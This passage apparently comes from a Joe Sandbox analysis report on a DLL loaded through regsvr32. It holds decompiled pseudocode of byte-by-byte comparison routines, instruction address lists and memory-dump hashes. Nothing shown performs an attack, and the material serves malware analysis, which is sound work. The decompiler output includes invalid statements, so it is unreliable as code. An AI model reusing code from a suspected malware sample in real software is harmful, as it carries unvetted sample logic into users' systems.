                                                                                                                					}
                                                                                                                					_t334 = (_t193 & 0x000000ff) - ( *(_t187 - 0x19) & 0x000000ff);
                                                                                                                					if(_t334 == 0) {
                                                                                                                						L16:
                                                                                                                						_t336 = ( *(_t183 - 0x18) & 0x000000ff) - ( *(_t187 - 0x18) & 0x000000ff);
                                                                                                                						if(_t336 == 0) {
                                                                                                                							L18:
                                                                                                                							_t338 = ( *(_t183 - 0x17) & 0x000000ff) - ( *(_t187 - 0x17) & 0x000000ff);
                                                                                                                							if(_t338 == 0) {
                                                                                                                								L20:
                                                                                                                								_t296 = ( *(_t183 - 0x16) & 0x000000ff) - ( *(_t187 - 0x16) & 0x000000ff);
                                                                                                                								if(_t296 != 0) {
                                                                                                                									_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                                                								}
                                                                                                                								goto L23;
                                                                                                                							}
                                                                                                                							_t296 = (0 | _t338 > 0x00000000) + (0 | _t338 > 0x00000000) - 1;
                                                                                                                							if(_t296 != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							goto L20;
                                                                                                                						}
                                                                                                                						_t296 = (0 | _t336 > 0x00000000) + (0 | _t336 > 0x00000000) - 1;
                                                                                                                						if(_t296 != 0) {
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						goto L18;
                                                                                                                					}
                                                                                                                					_t296 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
                                                                                                                					if(_t296 != 0) {
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					goto L16;
                                                                                                                				} else {
                                                                                                                					__esi = __dl & 0x000000ff;
                                                                                                                					__edx =  *(__ecx - 0x1d) & 0x000000ff;
                                                                                                                					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                                                                                                                					if(__esi == 0) {
                                                                                                                						L5:
                                                                                                                						__esi =  *(__eax - 0x1c) & 0x000000ff;
                                                                                                                						__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                                                                                                						__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                                                                                                						if(__esi == 0) {
                                                                                                                							L7:
                                                                                                                							__esi =  *(__eax - 0x1b) & 0x000000ff;
                                                                                                                							__edx =  *(__ecx - 0x1b) & 0x000000ff;
                                                                                                                							__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L9:
                                                                                                                								__esi =  *(__eax - 0x1a) & 0x000000ff;
                                                                                                                								__edx =  *(__ecx - 0x1a) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
                                                                                                                								if(__esi != 0) {
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								}
                                                                                                                								goto L12;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							__esi = __edx;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							goto L9;
                                                                                                                						}
                                                                                                                						0 = 0 | __esi > 0x00000000;
                                                                                                                						__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                						__esi = __edx;
                                                                                                                						if(__edx != 0) {
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						goto L7;
                                                                                                                					}
                                                                                                                					0 = 0 | __esi > 0x00000000;
                                                                                                                					__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                					__esi = __edx;
                                                                                                                					if(__edx != 0) {
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					goto L5;
                                                                                                                				}
                                                                                                                				L1:
                                                                                                                				_t184 = _t296;
                                                                                                                				goto L2;
                                                                                                                			}






























                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b41d
                                                                                                                0x1004b3f8
                                                                                                                0x1004b3fc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b3fc
                                                                                                                0x1004b3d7
                                                                                                                0x1004b3db
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b3db
                                                                                                                0x1004b339
                                                                                                                0x1004b33b
                                                                                                                0x1004b352
                                                                                                                0x1004b35a
                                                                                                                0x1004b35c
                                                                                                                0x1004b373
                                                                                                                0x1004b37b
                                                                                                                0x1004b37d
                                                                                                                0x1004b394
                                                                                                                0x1004b39c
                                                                                                                0x1004b39e
                                                                                                                0x1004b3ab
                                                                                                                0x1004b3ab
                                                                                                                0x00000000
                                                                                                                0x1004b39e
                                                                                                                0x1004b38a
                                                                                                                0x1004b38e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b38e
                                                                                                                0x1004b369
                                                                                                                0x1004b36d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b36d
                                                                                                                0x1004b348
                                                                                                                0x1004b34c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b34c
                                                                                                                0x1004b2a9
                                                                                                                0x1004b2ab
                                                                                                                0x1004b2c2
                                                                                                                0x1004b2ca
                                                                                                                0x1004b2cc
                                                                                                                0x1004b2e3
                                                                                                                0x1004b2eb
                                                                                                                0x1004b2ed
                                                                                                                0x1004b304
                                                                                                                0x1004b30c
                                                                                                                0x1004b30e
                                                                                                                0x1004b31b
                                                                                                                0x1004b31b
                                                                                                                0x00000000
                                                                                                                0x1004b30e
                                                                                                                0x1004b2fa
                                                                                                                0x1004b2fe
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b2fe
                                                                                                                0x1004b2d9
                                                                                                                0x1004b2dd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b2dd
                                                                                                                0x1004b2b8
                                                                                                                0x1004b2bc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b2bc
                                                                                                                0x1004b21a
                                                                                                                0x1004b21c
                                                                                                                0x1004b233
                                                                                                                0x1004b23b
                                                                                                                0x1004b23d
                                                                                                                0x1004b254
                                                                                                                0x1004b25c
                                                                                                                0x1004b25e
                                                                                                                0x1004b275
                                                                                                                0x1004b27d
                                                                                                                0x1004b27f
                                                                                                                0x1004b28c
                                                                                                                0x1004b28c
                                                                                                                0x00000000
                                                                                                                0x1004b27f
                                                                                                                0x1004b26b
                                                                                                                0x1004b26f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b26f
                                                                                                                0x1004b24a
                                                                                                                0x1004b24e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b24e
                                                                                                                0x1004b229
                                                                                                                0x1004b22d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b22d
                                                                                                                0x1004b18b
                                                                                                                0x1004b18d
                                                                                                                0x1004b1a4
                                                                                                                0x1004b1ac
                                                                                                                0x1004b1ae
                                                                                                                0x1004b1c5
                                                                                                                0x1004b1cd
                                                                                                                0x1004b1cf
                                                                                                                0x1004b1e6
                                                                                                                0x1004b1ee
                                                                                                                0x1004b1f0
                                                                                                                0x1004b1fd
                                                                                                                0x1004b1fd
                                                                                                                0x00000000
                                                                                                                0x1004b1f0
                                                                                                                0x1004b1dc
                                                                                                                0x1004b1e0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b1e0
                                                                                                                0x1004b1bb
                                                                                                                0x1004b1bf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b1bf
                                                                                                                0x1004b19a
                                                                                                                0x1004b19e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b19e
                                                                                                                0x1004b0fc
                                                                                                                0x1004b0fe
                                                                                                                0x1004b115
                                                                                                                0x1004b11d
                                                                                                                0x1004b11f
                                                                                                                0x1004b136
                                                                                                                0x1004b13e
                                                                                                                0x1004b140
                                                                                                                0x1004b157
                                                                                                                0x1004b15f
                                                                                                                0x1004b161
                                                                                                                0x1004b16e
                                                                                                                0x1004b16e
                                                                                                                0x00000000
                                                                                                                0x1004b161
                                                                                                                0x1004b14d
                                                                                                                0x1004b151
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b151
                                                                                                                0x1004b12c
                                                                                                                0x1004b130
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b130
                                                                                                                0x1004b10b
                                                                                                                0x1004b10f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b066
                                                                                                                0x1004b066
                                                                                                                0x1004b069
                                                                                                                0x1004b06d
                                                                                                                0x1004b06f
                                                                                                                0x1004b086
                                                                                                                0x1004b086
                                                                                                                0x1004b08a
                                                                                                                0x1004b08e
                                                                                                                0x1004b090
                                                                                                                0x1004b0a7
                                                                                                                0x1004b0a7
                                                                                                                0x1004b0ab
                                                                                                                0x1004b0af
                                                                                                                0x1004b0b1
                                                                                                                0x1004b0c8
                                                                                                                0x1004b0c8
                                                                                                                0x1004b0cc
                                                                                                                0x1004b0d0
                                                                                                                0x1004b0d2
                                                                                                                0x1004b0d8
                                                                                                                0x1004b0db
                                                                                                                0x1004b0df
                                                                                                                0x1004b0df
                                                                                                                0x00000000
                                                                                                                0x1004b0d2
                                                                                                                0x1004b0b7
                                                                                                                0x1004b0ba
                                                                                                                0x1004b0be
                                                                                                                0x1004b0c2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b0c2
                                                                                                                0x1004b096
                                                                                                                0x1004b099
                                                                                                                0x1004b09d
                                                                                                                0x1004b0a1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b0a1
                                                                                                                0x1004b075
                                                                                                                0x1004b078
                                                                                                                0x1004b07c
                                                                                                                0x1004b080
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b080
                                                                                                                0x1004ac83
                                                                                                                0x1004ac83
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                • Instruction ID: b09dc26b6cbd36b72d4a4843220875c77306704c7617d04a292ef27add846ef7
                                                                                                                • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                • Instruction Fuzzy Hash: 65C17F73C0EDB30A83B5C12D41A826FEBA2AFC159232BC3F48CD47F389956A5D4496D4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1004AC8A(void* __eax, void* __ecx) {
                                                                                                                				void* _t177;
                                                                                                                				signed int _t178;
                                                                                                                				void* _t181;
                                                                                                                				signed char _t187;
                                                                                                                				signed char _t188;
                                                                                                                				signed char _t189;
                                                                                                                				signed char _t191;
                                                                                                                				signed char _t192;
                                                                                                                				signed int _t198;
                                                                                                                				signed int _t284;
                                                                                                                				void* _t287;
                                                                                                                				void* _t289;
                                                                                                                				void* _t291;
                                                                                                                				void* _t293;
                                                                                                                				void* _t295;
                                                                                                                				void* _t297;
                                                                                                                				void* _t300;
                                                                                                                				void* _t302;
                                                                                                                				void* _t304;
                                                                                                                				void* _t307;
                                                                                                                				void* _t309;
                                                                                                                				void* _t311;
                                                                                                                				void* _t314;
                                                                                                                				void* _t316;
                                                                                                                				void* _t318;
                                                                                                                				void* _t321;
                                                                                                                				void* _t323;
                                                                                                                				void* _t325;
                                                                                                                
                                                                                                                				_t181 = __ecx;
                                                                                                                				_t177 = __eax;
                                                                                                                				if( *((intOrPtr*)(__eax - 0x1c)) ==  *((intOrPtr*)(__ecx - 0x1c))) {
                                                                                                                					_t284 = 0;
                                                                                                                					L11:
                                                                                                                					if(_t284 != 0) {
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					_t187 =  *(_t177 - 0x18);
                                                                                                                					if(_t187 ==  *(_t181 - 0x18)) {
                                                                                                                						_t284 = 0;
                                                                                                                						L22:
                                                                                                                						if(_t284 != 0) {
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						_t188 =  *(_t177 - 0x14);
                                                                                                                						if(_t188 ==  *(_t181 - 0x14)) {
                                                                                                                							_t284 = 0;
                                                                                                                							L33:
                                                                                                                							if(_t284 != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							_t189 =  *(_t177 - 0x10);
                                                                                                                							if(_t189 ==  *(_t181 - 0x10)) {
                                                                                                                								_t284 = 0;
                                                                                                                								L44:
                                                                                                                								if(_t284 != 0) {
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								if( *(_t177 - 0xc) ==  *(_t181 - 0xc)) {
                                                                                                                									_t284 = 0;
                                                                                                                									L55:
                                                                                                                									if(_t284 != 0) {
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                									_t191 =  *(_t177 - 8);
                                                                                                                									if(_t191 ==  *(_t181 - 8)) {
                                                                                                                										_t284 = 0;
                                                                                                                										L66:
                                                                                                                										if(_t284 != 0) {
                                                                                                                											goto L1;
                                                                                                                										}
                                                                                                                										_t192 =  *(_t177 - 4);
                                                                                                                										if(_t192 ==  *(_t181 - 4)) {
                                                                                                                											_t178 = 0;
                                                                                                                											L78:
                                                                                                                											if(_t178 == 0) {
                                                                                                                												_t178 = 0;
                                                                                                                											}
                                                                                                                											L80:
                                                                                                                											return _t178;
                                                                                                                										}
                                                                                                                										_t287 = (_t192 & 0x000000ff) - ( *(_t181 - 4) & 0x000000ff);
                                                                                                                										if(_t287 == 0) {
                                                                                                                											L70:
                                                                                                                											_t289 = ( *(_t177 - 3) & 0x000000ff) - ( *(_t181 - 3) & 0x000000ff);
                                                                                                                											if(_t289 == 0) {
                                                                                                                												L72:
                                                                                                                												_t291 = ( *(_t177 - 2) & 0x000000ff) - ( *(_t181 - 2) & 0x000000ff);
                                                                                                                												if(_t291 == 0) {
                                                                                                                													L75:
                                                                                                                													_t178 = ( *(_t177 - 1) & 0x000000ff) - ( *(_t181 - 1) & 0x000000ff);
                                                                                                                													if(_t178 != 0) {
                                                                                                                														_t178 = (0 | _t178 > 0x00000000) + (0 | _t178 > 0x00000000) - 1;
                                                                                                                													}
                                                                                                                													goto L78;
                                                                                                                												}
                                                                                                                												_t198 = (0 | _t291 > 0x00000000) + (0 | _t291 > 0x00000000) - 1;
                                                                                                                												if(_t198 == 0) {
                                                                                                                													goto L75;
                                                                                                                												}
                                                                                                                												L74:
                                                                                                                												_t178 = _t198;
                                                                                                                												goto L78;
                                                                                                                											}
                                                                                                                											_t198 = (0 | _t289 > 0x00000000) + (0 | _t289 > 0x00000000) - 1;
                                                                                                                											if(_t198 != 0) {
                                                                                                                												goto L74;
                                                                                                                											}
                                                                                                                											goto L72;
                                                                                                                										}
                                                                                                                										_t198 = (0 | _t287 > 0x00000000) + (0 | _t287 > 0x00000000) - 1;
                                                                                                                										if(_t198 != 0) {
                                                                                                                											goto L74;
                                                                                                                										}
                                                                                                                										goto L70;
                                                                                                                									}
                                                                                                                									_t293 = (_t191 & 0x000000ff) - ( *(_t181 - 8) & 0x000000ff);
                                                                                                                									if(_t293 == 0) {
                                                                                                                										L59:
                                                                                                                										_t295 = ( *(_t177 - 7) & 0x000000ff) - ( *(_t181 - 7) & 0x000000ff);
                                                                                                                										if(_t295 == 0) {
                                                                                                                											L61:
                                                                                                                											_t297 = ( *(_t177 - 6) & 0x000000ff) - ( *(_t181 - 6) & 0x000000ff);
                                                                                                                											if(_t297 == 0) {
                                                                                                                												L63:
                                                                                                                												_t284 = ( *(_t177 - 5) & 0x000000ff) - ( *(_t181 - 5) & 0x000000ff);
                                                                                                                												if(_t284 != 0) {
                                                                                                                													_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                                                                                                                												}
                                                                                                                												goto L66;
                                                                                                                											}
                                                                                                                											_t284 = (0 | _t297 > 0x00000000) + (0 | _t297 > 0x00000000) - 1;
                                                                                                                											if(_t284 != 0) {
                                                                                                                												goto L1;
                                                                                                                											}
                                                                                                                											goto L63;
                                                                                                                										}
                                                                                                                										_t284 = (0 | _t295 > 0x00000000) + (0 | _t295 > 0x00000000) - 1;
                                                                                                                										if(_t284 != 0) {
                                                                                                                											goto L1;
                                                                                                                										}
                                                                                                                										goto L61;
                                                                                                                									}
                                                                                                                									_t284 = (0 | _t293 > 0x00000000) + (0 | _t293 > 0x00000000) - 1;
                                                                                                                									if(_t284 != 0) {
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                									goto L59;
                                                                                                                								}
                                                                                                                								_t300 = ( *(_t177 - 0xc) & 0x000000ff) - ( *(_t181 - 0xc) & 0x000000ff);
                                                                                                                								if(_t300 == 0) {
                                                                                                                									L48:
                                                                                                                									_t302 = ( *(_t177 - 0xb) & 0x000000ff) - ( *(_t181 - 0xb) & 0x000000ff);
                                                                                                                									if(_t302 == 0) {
                                                                                                                										L50:
                                                                                                                										_t304 = ( *(_t177 - 0xa) & 0x000000ff) - ( *(_t181 - 0xa) & 0x000000ff);
                                                                                                                										if(_t304 == 0) {
                                                                                                                											L52:
                                                                                                                											_t284 = ( *(_t177 - 9) & 0x000000ff) - ( *(_t181 - 9) & 0x000000ff);
                                                                                                                											if(_t284 != 0) {
                                                                                                                												_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                                                                                                                											}
                                                                                                                											goto L55;
                                                                                                                										}
                                                                                                                										_t284 = (0 | _t304 > 0x00000000) + (0 | _t304 > 0x00000000) - 1;
                                                                                                                										if(_t284 != 0) {
                                                                                                                											goto L1;
                                                                                                                										}
                                                                                                                										goto L52;
                                                                                                                									}
                                                                                                                									_t284 = (0 | _t302 > 0x00000000) + (0 | _t302 > 0x00000000) - 1;
                                                                                                                									if(_t284 != 0) {
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                									goto L50;
                                                                                                                								}
                                                                                                                								_t284 = (0 | _t300 > 0x00000000) + (0 | _t300 > 0x00000000) - 1;
                                                                                                                								if(_t284 != 0) {
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								goto L48;
                                                                                                                							}
                                                                                                                							_t307 = (_t189 & 0x000000ff) - ( *(_t181 - 0x10) & 0x000000ff);
                                                                                                                							if(_t307 == 0) {
                                                                                                                								L37:
                                                                                                                								_t309 = ( *(_t177 - 0xf) & 0x000000ff) - ( *(_t181 - 0xf) & 0x000000ff);
                                                                                                                								if(_t309 == 0) {
                                                                                                                									L39:
                                                                                                                									_t311 = ( *(_t177 - 0xe) & 0x000000ff) - ( *(_t181 - 0xe) & 0x000000ff);
                                                                                                                									if(_t311 == 0) {
                                                                                                                										L41:
                                                                                                                										_t284 = ( *(_t177 - 0xd) & 0x000000ff) - ( *(_t181 - 0xd) & 0x000000ff);
                                                                                                                										if(_t284 != 0) {
                                                                                                                											_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                                                                                                                										}
                                                                                                                										goto L44;
                                                                                                                									}
                                                                                                                									_t284 = (0 | _t311 > 0x00000000) + (0 | _t311 > 0x00000000) - 1;
                                                                                                                									if(_t284 != 0) {
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                									goto L41;
                                                                                                                								}
                                                                                                                								_t284 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                                                								if(_t284 != 0) {
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								goto L39;
                                                                                                                							}
                                                                                                                							_t284 = (0 | _t307 > 0x00000000) + (0 | _t307 > 0x00000000) - 1;
                                                                                                                							if(_t284 != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							goto L37;
                                                                                                                						}
                                                                                                                						_t314 = (_t188 & 0x000000ff) - ( *(_t181 - 0x14) & 0x000000ff);
                                                                                                                						if(_t314 == 0) {
                                                                                                                							L26:
                                                                                                                							_t316 = ( *(_t177 - 0x13) & 0x000000ff) - ( *(_t181 - 0x13) & 0x000000ff);
                                                                                                                							if(_t316 == 0) {
                                                                                                                								L28:
                                                                                                                								_t318 = ( *(_t177 - 0x12) & 0x000000ff) - ( *(_t181 - 0x12) & 0x000000ff);
                                                                                                                								if(_t318 == 0) {
                                                                                                                									L30:
                                                                                                                									_t284 = ( *(_t177 - 0x11) & 0x000000ff) - ( *(_t181 - 0x11) & 0x000000ff);
                                                                                                                									if(_t284 != 0) {
                                                                                                                										_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                                                                                                                									}
                                                                                                                									goto L33;
                                                                                                                								}
                                                                                                                								_t284 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
                                                                                                                								if(_t284 != 0) {
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								goto L30;
                                                                                                                							}
                                                                                                                							_t284 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                                                							if(_t284 != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							goto L28;
                                                                                                                						}
                                                                                                                						_t284 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
                                                                                                                						if(_t284 != 0) {
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						goto L26;
                                                                                                                					}
                                                                                                                					_t321 = (_t187 & 0x000000ff) - ( *(_t181 - 0x18) & 0x000000ff);
                                                                                                                					if(_t321 == 0) {
                                                                                                                						L15:
                                                                                                                						_t323 = ( *(_t177 - 0x17) & 0x000000ff) - ( *(_t181 - 0x17) & 0x000000ff);
                                                                                                                						if(_t323 == 0) {
                                                                                                                							L17:
                                                                                                                							_t325 = ( *(_t177 - 0x16) & 0x000000ff) - ( *(_t181 - 0x16) & 0x000000ff);
                                                                                                                							if(_t325 == 0) {
                                                                                                                								L19:
                                                                                                                								_t284 = ( *(_t177 - 0x15) & 0x000000ff) - ( *(_t181 - 0x15) & 0x000000ff);
                                                                                                                								if(_t284 != 0) {
                                                                                                                									_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                                                                                                                								}
                                                                                                                								goto L22;
                                                                                                                							}
                                                                                                                							_t284 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
                                                                                                                							if(_t284 != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							goto L19;
                                                                                                                						}
                                                                                                                						_t284 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
                                                                                                                						if(_t284 != 0) {
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						goto L17;
                                                                                                                					}
                                                                                                                					_t284 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
                                                                                                                					if(_t284 != 0) {
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					goto L15;
                                                                                                                				} else {
                                                                                                                					__esi = __dl & 0x000000ff;
                                                                                                                					__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                                                                                                					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                                                                                                					if(__esi == 0) {
                                                                                                                						L4:
                                                                                                                						__esi =  *(__eax - 0x1b) & 0x000000ff;
                                                                                                                						__edx =  *(__ecx - 0x1b) & 0x000000ff;
                                                                                                                						__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                                                                                                                						if(__esi == 0) {
                                                                                                                							L6:
                                                                                                                							__esi =  *(__eax - 0x1a) & 0x000000ff;
                                                                                                                							__edx =  *(__ecx - 0x1a) & 0x000000ff;
                                                                                                                							__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L8:
                                                                                                                								__esi =  *(__eax - 0x19) & 0x000000ff;
                                                                                                                								__edx =  *(__ecx - 0x19) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
                                                                                                                								if(__esi != 0) {
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								}
                                                                                                                								goto L11;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							__esi = __edx;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							goto L8;
                                                                                                                						}
                                                                                                                						0 = 0 | __esi > 0x00000000;
                                                                                                                						__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                						__esi = __edx;
                                                                                                                						if(__edx != 0) {
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						goto L6;
                                                                                                                					}
                                                                                                                					0 = 0 | __esi > 0x00000000;
                                                                                                                					__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                					__esi = __edx;
                                                                                                                					if(__edx != 0) {
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					goto L4;
                                                                                                                				}
                                                                                                                				L1:
                                                                                                                				_t178 = _t284;
                                                                                                                				goto L80;
                                                                                                                			}































                                                                                                                0x1004af2d
                                                                                                                0x1004af2f
                                                                                                                0x1004af3c
                                                                                                                0x1004af3c
                                                                                                                0x00000000
                                                                                                                0x1004af2f
                                                                                                                0x1004af1b
                                                                                                                0x1004af1f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004af1f
                                                                                                                0x1004aefa
                                                                                                                0x1004aefe
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004aefe
                                                                                                                0x1004aed9
                                                                                                                0x1004aedd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004aedd
                                                                                                                0x1004ae3a
                                                                                                                0x1004ae3c
                                                                                                                0x1004ae53
                                                                                                                0x1004ae5b
                                                                                                                0x1004ae5d
                                                                                                                0x1004ae74
                                                                                                                0x1004ae7c
                                                                                                                0x1004ae7e
                                                                                                                0x1004ae95
                                                                                                                0x1004ae9d
                                                                                                                0x1004ae9f
                                                                                                                0x1004aeac
                                                                                                                0x1004aeac
                                                                                                                0x00000000
                                                                                                                0x1004ae9f
                                                                                                                0x1004ae8b
                                                                                                                0x1004ae8f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ae8f
                                                                                                                0x1004ae6a
                                                                                                                0x1004ae6e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ae6e
                                                                                                                0x1004ae49
                                                                                                                0x1004ae4d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ae4d
                                                                                                                0x1004adab
                                                                                                                0x1004adad
                                                                                                                0x1004adc4
                                                                                                                0x1004adcc
                                                                                                                0x1004adce
                                                                                                                0x1004ade5
                                                                                                                0x1004aded
                                                                                                                0x1004adef
                                                                                                                0x1004ae06
                                                                                                                0x1004ae0e
                                                                                                                0x1004ae10
                                                                                                                0x1004ae1d
                                                                                                                0x1004ae1d
                                                                                                                0x00000000
                                                                                                                0x1004ae10
                                                                                                                0x1004adfc
                                                                                                                0x1004ae00
                                                                                                                0x00000000
                                                                                                                0x00000000
